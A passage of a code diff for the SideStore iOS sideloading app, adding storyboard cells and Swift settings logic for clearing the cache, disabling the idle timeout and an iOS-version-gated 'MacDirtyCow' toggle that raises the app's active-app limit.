+                                                    <rect key="frame" x="30" y="15.5" width="98.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="kux-ac-Ujm" firstAttribute="centerY" secondItem="KhD-Gc-Ehv" secondAttribute="centerY" id="Ep6-5u-UiO"/>
+                                                <constraint firstItem="kux-ac-Ujm" firstAttribute="leading" secondItem="KhD-Gc-Ehv" secondAttribute="leadingMargin" id="M3Y-cf-s4C"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="6NJ-PB-6Jz" secondAttribute="trailing" id="SfD-jS-svQ"/>
+                                                <constraint firstItem="6NJ-PB-6Jz" firstAttribute="centerY" secondItem="KhD-Gc-Ehv" secondAttribute="centerY" id="ymQ-xO-ARV"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="0"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                </cells>
+                            </tableViewSection>
                             <tableViewSection headerTitle="" id="OMa-EK-hRI">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="FMZ-as-Ljo" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="870" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1008" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="FMZ-as-Ljo" id="JzL-Of-A3T">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Send Feedback" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="pMI-Aj-nQF">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Send Feedback" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="pMI-Aj-nQF">
                                                     <rect key="frame" x="30" y="15.5" width="125.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Jyy-x0-Owj">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Jyy-x0-Owj">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -514,19 +590,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="Qca-pU-sJh" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="921" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1059" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="Qca-pU-sJh" id="QtU-8J-VQN">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="View Refresh Attempts" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="sni-07-q0M">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="View Refresh Attempts" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="sni-07-q0M">
                                                     <rect key="frame" x="30" y="15.5" width="187.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="4d3-me-Hqc">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="4d3-me-Hqc">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -550,19 +626,19 @@
                                         </connections>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="rE2-P4-OaE" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="972" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1110" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="rE2-P4-OaE" id="qIT-rz-ZUb">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="View Error Log" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PWC-OG-5jx">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="View Error Log" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PWC-OG-5jx">
                                                     <rect key="frame" x="30" y="15.5" width="119" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="VfB-c5-5wG">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="VfB-c5-5wG">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -582,23 +658,56 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
                                         </userDefinedRuntimeAttributes>
                                         <connections>
-                                            <segue destination="g8a-Rf-zWa" kind="show" identifier="showErrorLog" id="SSW-vL-86I"/>
+                                            <segue destination="g8a-Rf-zWa" kind="show" id="vFC-Id-Ww6"/>
                                         </connections>
                                     </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="eZ3-BT-q4D" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="1161" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="eZ3-BT-q4D" id="17m-VV-hzf">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Clear Cache" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="IbH-V1-ce3">
+                                                    <rect key="frame" x="30" y="15.5" width="98.5" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="FZe-BJ-fOm">
+                                                    <rect key="frame" x="327" y="16.5" width="18" height="18"/>
+                                                </imageView>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstItem="FZe-BJ-fOm" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="bGv-Np-5aO"/>
+                                                <constraint firstAttribute="trailingMargin" secondItem="FZe-BJ-fOm" secondAttribute="trailing" id="ccb-JP-Eqi"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="centerY" secondItem="17m-VV-hzf" secondAttribute="centerY" id="iQJ-gN-sRF"/>
+                                                <constraint firstItem="IbH-V1-ce3" firstAttribute="leading" secondItem="17m-VV-hzf" secondAttribute="leadingMargin" id="m1g-Y6-aT5"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="VNn-u4-cN8" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1023" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1212" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="VNn-u4-cN8" id="4bh-qe-l2N">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Reset Pairing File" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ysS-9s-dXm">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Reset Pairing File" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="ysS-9s-dXm">
                                                     <rect key="frame" x="30" y="15.5" width="140" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="r09-mH-pOD">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="r09-mH-pOD">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -619,19 +728,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="e7s-hL-kv9" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1074" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1263" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="e7s-hL-kv9" id="yjL-Mu-HTk">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Reset adi.pb" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="eds-Dj-36y">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Reset adi.pb" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="eds-Dj-36y">
                                                     <rect key="frame" x="30" y="15.5" width="102" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="0dh-yd-7i9">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="0dh-yd-7i9">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -652,19 +761,19 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="fj2-EJ-Z98" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="1125" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="1314" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="fj2-EJ-Z98" id="BcT-Fs-KNg">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Advanced Settings" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="OcM-OM-uDE">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Advanced Settings" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="OcM-OM-uDE">
                                                     <rect key="frame" x="30" y="15.5" width="154" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Pcu-Sy-yfZ">
+                                                <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Pcu-Sy-yfZ">
                                                     <rect key="frame" x="327" y="16.5" width="18" height="18"/>
                                                 </imageView>
                                             </subviews>
@@ -689,15 +798,16 @@
                         </sections>
                         <connections>
                             <outlet property="dataSource" destination="aMk-Xp-UL8" id="c6c-fR-8C4"/>
-                            <outlet property="delegate" destination="aMk-Xp-UL8" id="moP-1B-lRq"/>
                         </connections>
                     </tableView>
                     <navigationItem key="navigationItem" title="Settings" id="Ddg-UQ-KJ8"/>
                     <connections>
+                        <outlet property="MDCSwitch" destination="6NJ-PB-6Jz" id="bwj-oN-oRv"/>
                         <outlet property="accountEmailLabel" destination="0uP-Cd-tNX" id="14b-aL-yE3"/>
                         <outlet property="accountNameLabel" destination="CnN-M1-AYK" id="Ldc-Py-Bix"/>
                         <outlet property="accountTypeLabel" destination="434-MW-Den" id="mNB-QE-4Jg"/>
                         <outlet property="backgroundRefreshSwitch" destination="DPu-zD-Als" id="eiG-Hv-Vko"/>
+                        <outlet property="noIdleTimeoutSwitch" destination="iQA-wm-5ag" id="jHC-js-q0Y"/>
                         <outlet property="versionLabel" destination="bUR-rp-Nw2" id="85I-5R-hqz"/>
                     </connections>
                 </tableViewController>

AltStore/Settings/SettingsViewController.swift

@@ -24,19 +24,21 @@ extension SettingsViewController
         case appRefresh
         case instructions
         case credits
+        case mdc
         case debug
     }
     
     fileprivate enum AppRefreshRow: Int, CaseIterable
     {
         case backgroundRefresh
+        case noIdleTimeout
         
         @available(iOS 14, *)
         case addToSiri
         
         static var allCases: [AppRefreshRow] {
-            guard #available(iOS 14, *) else { return [.backgroundRefresh] }
-            return [.backgroundRefresh, .addToSiri]
+            guard #available(iOS 14, *) else { return [.backgroundRefresh, .noIdleTimeout] }
+            return [.backgroundRefresh, .noIdleTimeout, .addToSiri]
         }
     }
     
@@ -53,9 +55,11 @@ extension SettingsViewController
         case sendFeedback
         case refreshAttempts
         case errorLog
+        case clearCache
         case resetPairingFile
         case resetAdiPb
         case advancedSettings
+    
     }
 }
 
@@ -73,6 +77,8 @@ final class SettingsViewController: UITableViewController
     @IBOutlet private var accountTypeLabel: UILabel!
     
     @IBOutlet private var backgroundRefreshSwitch: UISwitch!
+    @IBOutlet private var noIdleTimeoutSwitch: UISwitch!
+    @IBOutlet private var MDCSwitch: UISwitch!
     
     @IBOutlet private var versionLabel: UILabel!
     
@@ -148,6 +154,30 @@ private extension SettingsViewController
         }
         
         self.backgroundRefreshSwitch.isOn = UserDefaults.standard.isBackgroundRefreshEnabled
+        self.noIdleTimeoutSwitch.isOn = UserDefaults.standard.isIdleTimeoutDisableEnabled
+        
+        let MDCMinimumVersion = OperatingSystemVersion(majorVersion: 14, minorVersion: 0, patchVersion: 0)
+        let MDCMaximumVersion1 = OperatingSystemVersion(majorVersion: 15, minorVersion: 7, patchVersion: 2)
+        let MDCMaximumVersionSep = OperatingSystemVersion(majorVersion: 16, minorVersion: 0, patchVersion: 0)
+        let MDCMaximumVersion2 = OperatingSystemVersion(majorVersion: 16, minorVersion: 2, patchVersion: 0)
+        
+        var canUseMDC = false
+        
+        if ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMinimumVersion) { // at least 14.0.0
+            if !ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersion1) { // not at least 15.7.2 (less than 15.7.2)
+                canUseMDC = true
+            }
+            if !ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersion2) && ProcessInfo.processInfo.isOperatingSystemAtLeast(MDCMaximumVersionSep) { // not at least 16.2.0 but more than 16.0.0
+                canUseMDC = true
+            }
+        }
+        
+        if !canUseMDC {
+            UserDefaults.standard.isMDCEnabled = false
+        }
+        
+        self.MDCSwitch.isOn = UserDefaults.standard.isMDCEnabled
+        self.MDCSwitch.isEnabled = canUseMDC
         
         if self.isViewLoaded
         {
@@ -161,7 +191,7 @@ private extension SettingsViewController
         settingsHeaderFooterView.secondaryLabel.isHidden = isHeader
         settingsHeaderFooterView.button.isHidden = true
         
-        settingsHeaderFooterView.layoutMargins.bottom = isHeader ? 0 : 8
+        settingsHeaderFooterView.layoutMargins.bottom = isHeader ? 0 : 9
         
         switch section
         {
@@ -207,6 +237,21 @@ private extension SettingsViewController
             
         case .credits:
             settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("CREDITS", comment: "")
+        
+        case .mdc:
+            if isHeader
+            {
+                settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("MACDIRTYCOW", comment: "")
+            }
+            else
+            {
+                #if MACDIRTYCOW
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("This only works on iOS 15 - 15.7.1 and iOS 16 - iOS 16.1.2", comment: "")
+                #else
+                settingsHeaderFooterView.secondaryLabel.text = NSLocalizedString("This only works on iOS 15 - 15.7.1 and iOS 16 - iOS 16.1.2. This build is not a MacDirtyCow build, therefore this will only lift the 3 app limit", comment: "")
+                #endif
+                settingsHeaderFooterView.secondaryLabel.isHidden = false
+            }
             
         case .debug:
             settingsHeaderFooterView.primaryLabel.text = NSLocalizedString("DEBUG", comment: "")
@@ -280,6 +325,22 @@ private extension SettingsViewController
         UserDefaults.standard.isBackgroundRefreshEnabled = sender.isOn
     }
     
+    @IBAction func toggleNoIdleTimeoutEnabled(_ sender: UISwitch)
+    {
+        UserDefaults.standard.isIdleTimeoutDisableEnabled = sender.isOn
+    }
+    
+    @IBAction func toggleMDCEnabled(_ sender: UISwitch)
+    {
+        UserDefaults.standard.isMDCEnabled = sender.isOn
+        if sender.isOn {
+            UserDefaults.standard.activeAppsLimit = 69420
+        }
+        else {
+            UserDefaults.standard.activeAppsLimit = 3
+        }
+    }
+    
     @available(iOS 14, *)
     @IBAction func addRefreshAppsShortcut()
     {
@@ -291,6 +352,39 @@ private extension SettingsViewController
         self.present(viewController, animated: true, completion: nil)
     }
     
+    func clearCache()
+    {
+        let alertController = UIAlertController(title: NSLocalizedString("Are you sure you want to clear SideStore's cache?", comment: ""),
+                                                message: NSLocalizedString("This will remove all temporary files as well as backups for uninstalled apps.", comment: ""),
+                                                preferredStyle: .actionSheet)
+        alertController.addAction(UIAlertAction(title: UIAlertAction.cancel.title, style: UIAlertAction.cancel.style) { [weak self] _ in
+            self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+        })
+        alertController.addAction(UIAlertAction(title: NSLocalizedString("Clear Cache", comment: ""), style: .destructive) { [weak self] _ in
+            AppManager.shared.clearAppCache { result in
+                DispatchQueue.main.async {
+                    self?.tableView.indexPathForSelectedRow.map { self?.tableView.deselectRow(at: $0, animated: true) }
+                    
+                    switch result
+                    {
+                    case .success: break
+                    case .failure(let error):
+                        let alertController = UIAlertController(title: NSLocalizedString("Unable to Clear Cache", comment: ""), message: error.localizedDescription, preferredStyle: .alert)
+                        alertController.addAction(.ok)
+                        self?.present(alertController, animated: true)
+                    }
+                }
+            }
+        })
+        
+        if let popoverController = alertController.popoverPresentationController {
+            popoverController.sourceView = self.view
+            popoverController.sourceRect = CGRect(x: self.view.bounds.midX, y: self.view.bounds.midY, width: 0, height: 0)
+        }
+        
+        self.present(alertController, animated: true)
+    }
+    
     @IBAction func handleDebugModeGesture(_ gestureRecognizer: UISwipeGestureRecognizer)
     {
         self.debugGestureCounter += 1
@@ -377,15 +471,26 @@ extension SettingsViewController
     {
         let cell = super.tableView(tableView, cellForRowAt: indexPath)
         
-        if #available(iOS 14, *) {}
-        else if let cell = cell as? InsetGroupTableViewCell,
-                indexPath.section == Section.appRefresh.rawValue,
-                indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+//        if #available(iOS 14, *) {}
+//        else if let cell = cell as? InsetGroupTableViewCell,
+//                indexPath.section == Section.appRefresh.rawValue,
+//                indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+//        {
+//            // Only one row is visible pre-iOS 14.
+//            cell.style = .single
+//        }
+        
+        if AppRefreshRow.AllCases().count == 1
         {
-            // Only one row is visible pre-iOS 14.
-            cell.style = .single
+            if let cell = cell as? InsetGroupTableViewCell,
+               indexPath.section == Section.appRefresh.rawValue,
+               indexPath.row == AppRefreshRow.backgroundRefresh.rawValue
+            {
+                cell.style = .single
+            }
         }
         
+        
         return cell
     }
     
@@ -396,7 +501,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return nil
         case .account where self.activeTeam == nil: return nil
-        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug, .mdc:
             let headerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(headerView, for: section, isHeader: true)
             return headerView
@@ -411,7 +516,7 @@ extension SettingsViewController
         switch section
         {
         case .signIn where self.activeTeam != nil: return nil
-        case .signIn, .patreon, .appRefresh:
+        case .signIn, .patreon, .appRefresh, .mdc:
             let footerView = tableView.dequeueReusableHeaderFooterView(withIdentifier: "HeaderFooterView") as! SettingsHeaderFooterView
             self.prepare(footerView, for: section, isHeader: false)
             return footerView
@@ -427,7 +532,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0
-        case .signIn, .account, .patreon, .appRefresh, .credits, .debug:
+        case .signIn, .account, .patreon, .appRefresh, .credits, .debug, .mdc:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: true)
             return height
             
@@ -442,7 +547,7 @@ extension SettingsViewController
         {
         case .signIn where self.activeTeam != nil: return 1.0
         case .account where self.activeTeam == nil: return 1.0            
-        case .signIn, .patreon, .appRefresh:
+        case .signIn, .patreon, .appRefresh, .mdc:
             let height = self.preferredHeight(for: self.prototypeHeaderFooterView, in: section, isHeader: false)
             return height
             
@@ -465,11 +570,13 @@ extension SettingsViewController
             switch row
             {
             case .backgroundRefresh: break
+            case .noIdleTimeout: break
             case .addToSiri:
                 guard #available(iOS 14, *) else { return }
                 self.addRefreshAppsShortcut()
             }
             
+            
         case .credits:
             let row = CreditsRow.allCases[indexPath.row]
             switch row
@@ -507,6 +614,9 @@ extension SettingsViewController
